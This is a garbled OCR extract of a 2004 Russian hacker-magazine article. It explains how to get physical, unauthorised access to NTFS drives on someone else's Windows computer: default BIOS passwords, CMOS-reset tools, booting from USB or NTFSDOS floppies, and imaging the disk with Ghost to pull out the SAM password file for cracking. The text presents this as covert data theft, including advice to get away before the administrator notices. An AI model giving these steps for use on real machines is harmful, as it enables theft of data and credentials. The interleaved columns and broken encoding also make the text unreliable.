
компьютера под любым аккаунтом.

устройств для работы с внешними но-

кой-либо дисковод и пароль на BIOS

Попробуй ввести один из стандарт-

сителями (FDD, CD/DVD-ROM/R/RW). К

не установлен. Настраиваешь в BIOS

ных паролей (AWARD_SW для изде-

хакерскому счастью, на подавляющем

лия фирмы AWARD,

большинстве PC есть гнезда для USB-

AMI для продукции од-

устройств. К ним и следует подклю-

ноименной фирмы) ли-

чить припасенный заранее внешний

бо при включении

накопитель и настроить в BIOS загруз-

удерживай комбинацию

ку с внешних USB-девайсов. При под-

клавиш

держке BIOS опции такого рода не все

девайсы сгодятся на роль загрузочно-

или просто клавишу

го устройства. Например, нельзя загру-

<Ins>. Если не помогло,

зиться с получивших массовое распро-

попытайся запустить на

странение «свистков». Наиболее под-

машине программу,

ходящим вариантом являются диски

сбрасывающую наст-

ZIF и переходники USB-IDE. И, конечно

ройки BIOS. Для

же, на внешнем носителе должна быть

Windows существует

установлена любая операционная сис-

достаточно много таких

тема с поддержкой NTFS.

программ:

Если загрузка с внешнего устрой-

nopasswd.com, kill-

ства прошла нормально и стали дос-

cmos.exe, awcrack.com è

тупны все разделы жесткого диска,

т.д. Найти их можно в

тебе остается слить нужную инфор-

ñåòè.

мацию, произвести необходимые

Если все попытки

действия и быстро уносить ноги. При

тщетны, остается при-

более неблагоприятных обстоятель-

бегнуть к вскрытию

ствах (отсутствие USB-портов, пароль

корпуса. Минусов у по-

на настройку BIOS или отсутствие

добного способа нес-

поддержки загрузки с внешних уст-

колько: кроме пароля,

ройств) без вскрытия корпуса никак

сбрасывается еще нес-

не обойтись. Если корпус не заключен

колько важных настро-

в металлический сейф (а бывает и та-

Выбери кодовую страницу

ек (например, время),

ХАКЕРСПЕЦ 11(48) 2004

hang

NOW!

BUY

w Click

df-xchan

СПИСОК ФАЙЛОВ, НЕОБХОДИМЫХ ДЛЯ РАБОТЫ NTFS-

DOS PROFESSIONAL È NTFS FOR WINDOWS 98

Для успешной установки и настройки NTFSDOS Professional и

NTFS for Windows 98 следует заранее запастись необходимыми

файлами, входящими в состав ОС Windows 2000/XP/2003:

-autochk.exe

-c_1252.nls

-C_866.NLS

-c_437.nls

-l_intl.nls

-ntdll.dll

-ntfs.sys

-ntoskrnl.exe

			неджер. Сжатые объекты, как и в
			неджер. Сжатые объекты, как и в
			Windows 2000/XP, поддерживаются
Необходимые драйвера NTFS			Windows 2000/XP, поддерживаются
Необходимые драйвера NTFS			прозрачно для пользователя. Разни-


			ца перед FAT ощущается лишь в нез-
причем иногда загрузка невозможна			начительно пониженной скорости при
без их изменения. Рано или поздно,			копировании/перемещении файлов.
но администратор заметит изменение			Во избежание повреждения структу-
пароля. В этот момент лучше нахо-			ры диска и корректного сохранения
диться на максимальном расстоянии			дескрипторов завершение работы
îò íåãî :).			следует производить комбинацией
После изменения порядка загрузки		Укажи папку с драйверами NTS	<Ctrl>+<Alt>+<Del>, à íå RESET èëè âûê-
нужно воспользоваться загрузочным			лючением питания.
диском (или дискетами), оснащенным			ВАРИАНТ ТРЕТИЙ
драйвером доступа к разделам NTFS с			ВАРИАНТ ТРЕТИЙ
возможностью записи. Для подготов-						На компьютере установлены две


ки загрузочного комплекта понадо-			операционные системы, одна из кото-
бятся программа “NTFSDOS			ðûõ – Windows 9x.
Professional” и четыре дискеты.					Сливаешь с сайта www.sysinternals.com
Первая служит для начальной заг-			программу NTFS for Windows 98. От-
рузки и может быть создана в любой			личие настройки этой программы от
ОС Windows. Лучше всего для этой це-
ли годится FDD, подготовленная в
ли годится FDD, подготовленная в
пресловутой Windows Me. Что бы ни		Дополнительные настройки
говорили про глючность Me, но загру-
говорили про глючность Me, но загру-
зочные диски она готовит лучше всех:
зочные диски она готовит лучше всех:
DOS загружается мгновенно, включе-
на поддержка CD, даже без удаления
лишних хелпов остается свободное
место для файлового менеджера
(например, Volkov Commander) и
драйвера мыши (а куда без него :)).
Перед использованием дискета нуж-
дается в небольшом препарировании.
В файле config.sys необходимо изме-
нить значение параметра files=10 на
files=50 или большее. Остальные три
дискеты скорми программе
BootDisk.exe.		4. По окончании загрузки програм-		Norton Ghost 32 – дамп диска в Windows
Если коротко, то порядок работы		4. По окончании загрузки програм-		Norton Ghost 32 – дамп диска в Windows
с полученным инструментом следу-	мы возвращаешь в дисковод загру-
þùèé:	зочную дискету
1. Загружаешь компьютер с первой		Дальнейшие действия - на твое ус-
дискеты в режиме "Minimal boot"	мотрение. Можешь проверить раздел
2. Вручную запускаешь файл NTF-	утилитой NTFSCHK с третьей дискеты.
SPRO.EXE со второй дискеты	Можешь производить манипуляции с
3. По требованию вставляешь сле-	файлами и каталогами из командной
дующую дискету	строки или загрузив файловый ме-

Для подготовки загрузочного комплекта понадобятся программа “NTFSDOS Professional” и четыре дискеты.

Работа с Ghost Explorer - как с Проводником

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

28 АТАКА ЧЕРЕЗОБРАЗЫКСЕРДЦУ

W W W

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

À Ò À Ê À Í À W I N D O W S

Производители упомянутых программ:

www.sysinternals.com

www.symantec.com

www.elcomsoft.com

Известный сайт рунета, посвященный информационной безопас-

ности - www.securitylab.ru

Изменения в образе всегда можно сохранить

Процесс займет время, которое напрямую

ее DOS-версии незначительно. После

установки следует указать располо-

зависит от производительности

жение драйверов для доступа к

компьютера.

NTFS. Затем указанные файлы пере-

мещать и тем более удалять не сле-

дует, так как без них программа ра-

Достаешь пакет программ Norton

ботать не будет. Назначь буквы для

архиву с возможностью копирова-

подключаемых разделов (которые

Ghost производства Symantec, жела-

ния/замены как отдельных файлов,

еще не заняты). В разделе Advanced

тельно версии не ниже 8.0. Этот пакет

так и целых директорий! Это значит,

Программы

настраиваются режимы буфериза-

позволяет делать резервные копии

что ты можешь легко создать образ

ции и периоды обновления метадан-

как отдельных партиций, так и целых

любого, не только NTFS диска, а затем

NTFSDOS

Professional,

ных. После перезагрузки в списке

дисков. Сохраняя всю файловую сис-

скопировать из него нужные данные

NTFS for

доступных дисков появятся подклю-

тему в один или несколько (в зависи-

(например, файл SAM, отдав его на

Windows 98

ченные разделы.

мости от занимаемого объема) фай-

съедение утилите L0phtCrack), рабо-

è Norton

Ghost ïîä-

лов, используя сжатие, которое в

тая в Windows 9x без перезагрузок и

держивают

ВАРИАНТ ЧЕТВЕРТЫЙ

среднем достигает 50%. Поддержива-

каких-либо манипуляций с BIOS.

êàê îáû÷-

íûå, òàê è

На компьютере установлены две

ется несколько наиболее распростра-

Íè Ghost for Windows, íè Ghost

сжатые

операционные системы, одна из кото-

ненных файловых систем: FAT, FAT32,

Explorer не требуют установки. Чтобы

NTFS-диски.

рых – Windows 9x. На FAT-диске есть

NTFS5, ext2 è HPFS.

создать образ партиции, выбери в

свободное пространство объемом нем-

При этом программа Ghost Explorer

меню программы Local -> Partition ->

ного больше 60% объема диска NTFS.

предоставляет доступ к созданному

To image и укажи раздел и место, ку-

да сохранить полученный образ. Спо-

Незарегист-

соб сжатия укажи High. Это позволит

сократить размер полученного архи-

рированная

AEFSDR

Указанные файлы перемещать

ва партиции до 50%. Процесс займет

расшифро-

время, которое напрямую зависит от

вывает

и тем более удалять не следует.

только пер-

производительности компьютера.

âûå 500

байт файла.

ВСТРОЕННОЕ ШИФРОВАНИЕ

Предположим, у тебя уже есть доступ к разделу NTFS, но ты полу- чил фиг с маслом. Как же так? Ведь говорилось, что на этом этапе можно забыть обо всех правах доступа! Верно, но права доступа здесь ни при чем. Для защиты от таких умников Microsoft оснастила разделы NTFS5 дополнительной защитой – Encrypting File System (EFS, зашифрованная файловая система). NFS – надстройка над NTFS, позволяющая прозрачно для пользователя шифровать и расшифровывать файлы. В сети, печатных журналах и много- численных учебниках можно найти хвалебные оды стойкости EFS-защи-


Сначала находишь ключи шифрования		Выбирай, что хочешь расшифровать

ХАКЕРСПЕЦ 11(48) 2004

<<< < Предыдущая 1 23 / 143 4 5 6 7 8 9 10 11 12 13 14 > Следующая >>>

Соседние файлы в папке специальные выпуски

#
20.04.202412.23 Mб16Специальный выпуск 43_Optimized.pdf
#
20.04.202410.68 Mб17Специальный выпуск 44_Optimized.pdf
#
20.04.202411.27 Mб15Специальный выпуск 45_Optimized.pdf
#
20.04.202412.65 Mб14Специальный выпуск 46_Optimized.pdf
#
20.04.202411.92 Mб16Специальный выпуск 47_Optimized.pdf
#
20.04.20249.21 Mб16Специальный выпуск 48_Optimized.pdf
#
20.04.20249.67 Mб14Специальный выпуск 49_Optimized.pdf
#
20.04.20249.14 Mб15Специальный выпуск 50_Optimized.pdf
#
20.04.20248.45 Mб14Специальный выпуск 51_Optimized.pdf
#
20.04.20249.27 Mб16Специальный выпуск 52_Optimized.pdf
#
20.04.20249.18 Mб16Специальный выпуск 53_Optimized.pdf